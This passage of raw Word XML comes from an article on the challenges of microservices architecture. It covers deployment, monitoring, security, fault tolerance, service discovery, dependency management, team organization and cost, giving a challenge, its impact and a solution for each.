        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unit testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>integration testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>end-to-end testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the entire system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451F72A6"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4AB573A0">
          <v:rect id="_x0000_i2896" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="627E3659"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6. Deployment and Versioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF7F1B0"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hallenge</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Continuous integration and continuous deployment (CI/CD) pipelines for microservices can be complex. Handling service versioning and coordinating deployments across different services can be challenging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FFC25C"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Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Risks of version incompatibilities, broken deployments, and downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CFF998"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Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Implement rolling deployments, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Blue-Green</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Canary deployments</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and manage service versioning carefully to ensure backward compatibility and smooth deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A72293"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2E21A0BC">
          <v:rect id="_x0000_i2897" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE619AC"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7. Monitoring and Observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F73C522"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hallenge</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With many services interacting in a microservices architecture, it becomes difficult to track the state and health of the entire system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775E8789"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Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Increased risk of undetected issues, especially in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008278FA"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Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>centralized logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., ELK stack), </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed tracing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Jaeger, Zipkin), and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metrics collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Prometheus) to track and monitor microservices. Implement automated alerting based on predefined thresholds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2867B902"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5B201D71">
          <v:rect id="_x0000_i2898" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E313F52"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8. Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3256F79B"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hallenge</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Microservices increase the attack surface since each service exposes its own API, often communicating over the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D65CA17"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Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Increased risk of security breaches and difficulties in securing each service individually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5506AF34"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Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>API Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for centralized authentication and authorization (e.g., OAuth2, JWT tokens), encrypt communication (e.g., using TLS), and follow best security practices such as least-privilege access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7C5420"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7A166D63">
          <v:rect id="_x0000_i2899" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B44197"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9. Network Latency and Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46452256"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hallenge</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In a distributed system, microservices communicate over the network, which can introduce latency and potential service failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654306F8"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Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Increased response time, service downtime, or cascading failures if one service becomes unavailable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576F4E1B"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Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Implement fault tolerance mechanisms like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>circuit breakers</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fallbacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>timeouts</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Use asynchronous communication patterns (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RabbitMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) for decoupling services and reducing synchronous dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64143EDE"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496F5A0A">
          <v:rect id="_x0000_i2900" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BCBB6A"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10. Service Discovery and Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6EB983"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hallenge</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With multiple services, keeping track of where each service is running and distributing requests efficiently can become complex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CF8E90"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Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Difficulty in managing dynamic scaling, service availability, and routing requests to the appropriate instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9CF816"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lastRenderedPageBreak/>
        <w:t>Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eureka</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Consul</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and integrate with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>load balancers</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure requests are routed to the right service instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E652A9"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4FDDFAD6">
          <v:rect id="_x0000_i2901" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FE022C"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11. Dependency Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A63796"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hallenge</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Managing dependencies between services can be tricky, especially when services have versioning and compatibility issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAF5B05"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Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Hard to manage backward compatibility and maintainability of the services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B43AD60"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Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>versioning strategies</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for APIs (e.g., semantic versioning) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>API gateways</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to abstract and manage dependencies. Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>contract testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure interface compatibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5F1E8E"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11ECCF58">
          <v:rect id="_x0000_i2902" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32240FE5"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12. Service Duplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8283A8"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hallenge</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In microservices, each service might implement a similar function, leading to duplication of business logic or data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2601981A"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Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Increased maintenance burden and potential inconsistencies in service behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2634EFA5"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Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Centralize common functionality into shared libraries or services. Promote reusability and avoid code duplication through </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shared service patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DA4A62"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44DB1027">
          <v:rect id="_x0000_i2903" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C646957"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13. Organizational Challenges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632A2358"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hallenge</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Adopting microservices requires significant changes in how teams operate. Developers need to be familiar with new technologies and methodologies, such as containerization, distributed systems, and continuous integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629AC0CE"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Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A shift in team culture, communication overhead, and challenges in skill gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E396DE"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Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Promote a culture of cross-functional teams, ensure training and upskilling, and foster collaboration between teams responsible for different microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671FC266"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23076FF4">
          <v:rect id="_x0000_i2904" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4871B7A5"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14. Cost Overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9F00B2"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hallenge</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Microservices require additional infrastructure to manage deployments, scaling, and communication. This often leads to higher operational costs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EA78A4"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Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Increased infrastructure and operational complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29230C76" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
